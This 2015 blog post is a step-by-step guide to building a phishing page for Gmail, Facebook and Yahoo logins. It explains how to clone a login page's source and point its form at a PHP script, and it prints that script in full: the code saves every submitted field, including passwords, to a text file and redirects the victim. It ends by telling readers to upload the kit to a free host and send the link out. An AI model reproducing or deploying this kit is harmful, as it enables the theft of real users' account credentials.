Monday, January 12, 2015

HACKING FACEBOOK,GMAIL,YAHOO,ETC (VERY EASY METHOD) FOR PHISHING.

1st - Go to your web site.
Ex - (www.gmail.com)


2nd - Go & click right key & view page source.



style="background-color: white;">3rd - Press Ctrl + A and copy it.


4th - Open notepad & past it.

5th - Ctri + F and Type action & find it. CLEAR https://accounts.google.com/ServiceLoginAuth  & Type post.php & Save as it.


6th - Save as & File name - index.htm or index.html,Save as type - All files


7th - Copy this code and Save as post.php

<?php
header ('Location:http://www.hotfighter.blogspot.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

8th - Open new notepad & Save as usernames.txt(This is empty)


9th - Go to this site & Register.www.my3gb.com

10th - Open file manager.



11th - Upload index.htm,post.php,usernames.txt


It's finish Give your URL & HACKING.



POST BY - Chathu(Admin)
















No comments: